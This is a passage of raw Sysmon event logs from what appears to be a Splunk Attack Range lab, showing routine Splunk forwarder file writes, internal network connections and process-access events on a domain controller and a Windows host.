Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=3FBDB1192F4C65389CF8DAA33934F5FF,SHA256=339593F99EA3DE5C4E9DC572973D0B677861069E94D75FA81A48F90889CB8413,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298553Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:31.357{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6734F93798CC6ACD9FAC100E1B02FF66,SHA256=1B16E39F246CA638DCFDA8AE4748C0DA2E074D983911F6074CBA5FA622145F92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222355Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:32.476{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37EF37FF4BE4E826F957E5596584CE3C,SHA256=A5B29F345F90CA0D3EB3F63E1450FC9CCF40EDD2E2F641BBA58966BFE16C26AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298559Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:32.810{C8EA50B7-F11F-6215-1000-000000003802}3646532C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298558Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:32.810{C8EA50B7-F11F-6215-1000-000000003802}3646532C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000298557Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:32.393{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=713F81D6ADBD5E4F6DEBF2A9E165ECF6,SHA256=E87C647A64CAD27464BF33CBC3D214C7A2B33A3617A9EDDECACD9FEB7831BD10,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222354Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:29.587{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51713-false10.0.1.12-8000- 23542300x8000000000000000222356Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:33.712{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED4A65DA52CA571A9B27E5B6DC370FCD,SHA256=E9F5575959F50A69A8EB69762B3B23416E1D187CD76A7558ECF756247BA31DAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298562Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:33.641{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=A89404FE8BB19B09CEB19AA432D8441E,SHA256=E81BFE0496F27B2D16F5DA4E9486301C079028C0E598133287DF92827397E8BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298561Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:33.410{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D186F905CFB9B9E121C74A552B8E0C3,SHA256=91675E7D426DD7F9B532CB644A6F84D7495BCE15D070CDA384DE616EA23BC702,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298560Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:30.606{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49537-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000222357Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:34.743{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64F634DA3471DF823FACD5C9B125226A,SHA256=471FF02E728FC2C9064ADDD672FA81F8D7B20C4348E0C0F8C9DBE10CF2EBDE14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298563Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:34.410{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9026FE13497F07E4FEC5D09FCD8D29D2,SHA256=573304E1026F8AFC4FA9D3AD68077B6B81FC41F740AAC330AB6F17B46870B8AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222358Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:35.884{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=214B3C4FA8E83BD9DBD45780A82C9256,SHA256=CC3035E61F461BDDDB3C386A4DAFCD563FF1244E88846DF690DACEAF401E6C73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298564Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:35.440{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CB53028371C1D8C99CEA55BDA678D61,SHA256=6537F7AEC024916D7993D9BFFF43AE2FDC6253EA42F3F09ED98F21A5961121C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222359Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:36.899{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52980786A8BE043477B7DD4C8307126D,SHA256=0390BB6A1F09C71A00F61D52889B7D9C96CA77DC5AD743A30043E7AC6134176F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298565Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:36.455{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DE1C3D75A9778929E6C0047325BFFAF,SHA256=B7B9F72AFCB0A4A125E5A26EB5E249A9E08D306F45ABC2CC254615182230386A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222361Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:37.962{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86A1FC7607F3579B9EF04B40CBC93373,SHA256=A3CC2FBC13564CC9706C2B9C0FCBB06737692B71DA8E15C9B965D04CB5CACB20,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298567Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:35.688{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49538-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298566Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:37.488{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21F9E6C24DB55E855A0BBA0D014C4467,SHA256=6C1E3DC7F259EC41B8B4AB9191B651EEFD4303E0E76A0672A828B06F45818BC6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222360Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:35.527{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51714-false10.0.1.12-8000- 23542300x8000000000000000298568Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:38.522{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C426E45D495DE7C5E10360D943051CD2,SHA256=0BC8E1A62FF6C2A7AD2C7D0086D5F201CA1366D539D748BF97F6DBB21F788BBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298569Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:39.539{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E0CF1CFBDA699DCCE03F25648DA9ABE,SHA256=5B78EB1B3C576198C9D5A549898E3B303ECE0A7FABA55B9F42B241D32DE9488D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222362Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:39.196{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=881081458BA3F75CE40E91B57ADDEEFB,SHA256=8B33EBBF42A2F15030FC48EFCE1779A74A8B9E2ADAF5A9B7566F2A86D41D39F8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:40.608{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:40.555{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5878B33D90DCA0DE4C6424EA518E9072,SHA256=D31C23FE39FCD363B7929FBF63998E69B785A92B421FD41E4BE786AF3A8605A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222363Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:40.196{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4E9DFFB95D4AACE645EE195F7A55E4F,SHA256=D05EB533662BA0E617092039D96A8E43311E996794157D4A74DF903A3AEE3894,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:41.570{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBBC8BA412EC7A5C98ED2A3314714F05,SHA256=9489DF3EFF74254A2C0077D0B6BE229408008118204D199375A5CF6815121261,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222364Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:41.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DE6CAA9E8CDA3C3070847F114D40FCC,SHA256=EDA29966CAFC057EB77F689286707AD3CA4B3D6CA7EB072D15BBA2DBAEE87406,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:40.703{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49540-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000298574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:40.051{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49539-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000298573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:42.623{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7ABA24B0A5AA7DBBA57CB340FEE6F9C,SHA256=AA9776AAE329FEBE227F86BF1BC0952367A4B3F13313BF5ADFCD6BB719DC8A2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000222366Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:40.604{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51715-false10.0.1.12-8000- 23542300x8000000000000000222365Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:42.274{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC2052F574A782B6A44E0EEABCBD5F24,SHA256=35AE1C54A5059897132126CD822B625EB9BBFCB658D6C41CC4C196176D33E91C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:43.653{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8187310B2DC2F98CC42779341FC653B,SHA256=C98E80067A5EC05B9001BBFE022026FE4FCE26FEE1759649FB095778C538C01A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222367Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:43.290{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C720A34DA71278CC5F2025EA71779E13,SHA256=47E0594E879E5DA164DF5A2633F503313872E887D722379F4AEACD3B48DBE576,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:44.688{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44F8CCCECFF811098810CE1FD4931423,SHA256=AA25447436029F1A5A25001DF90BF7B54C8B469B7A5541B08B728A200AD075F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222395Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.805{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1904-6216-3A05-000000003902}2752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222394Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.805{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222393Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.805{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222392Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.805{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222391Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.805{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222390Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:44.805{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\